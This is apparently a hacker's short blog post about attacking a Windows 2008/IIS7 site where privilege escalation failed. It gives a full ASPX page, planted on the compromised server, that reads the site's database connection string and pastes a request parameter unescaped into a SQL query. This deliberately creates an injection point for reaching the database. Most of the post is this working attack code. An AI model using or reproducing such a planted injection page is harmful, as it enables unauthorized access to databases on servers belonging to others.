Yesterday 4z1 and I were looking at a site, and privilege escalation was really hard: a full 5 hours of looking, with nothing to show for it. 2008 + IIS7, no sa, no root, no services of any kind...
What we actually used was an aspx constructed injection to go cross-site. Found a pile of code online; not one piece of it worked.
It's not much code, so I just wrote my own. So annoying.
<%@ Page Language="C#" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head runat="server">
<title>暗影 aspx constructed-injection page</title>
</head>
<body>
<form id="form1" runat="server">
<div>
<script language="c#" runat="server">

void Page_Init(object sender, EventArgs e)
{
    System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();
    // "连接名" is the placeholder for the connection string name in web.config
    conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ConnectionString;
    conn.Open();

    string i = this.Page.Request.Params["xxser"]; // this is the parameter: ?xxser=1

    // the value is concatenated straight into the SQL; "[表]" and "列名" are placeholders for the table and column names
    System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);
    int x = command.ExecuteNonQuery(); // returns -1 for a SELECT; the page only cares whether the statement ran
    Response.Write(i + "\n");
    Response.Write(x);
    conn.Close();
}

</script>
</div>
</form>
</body>
</html>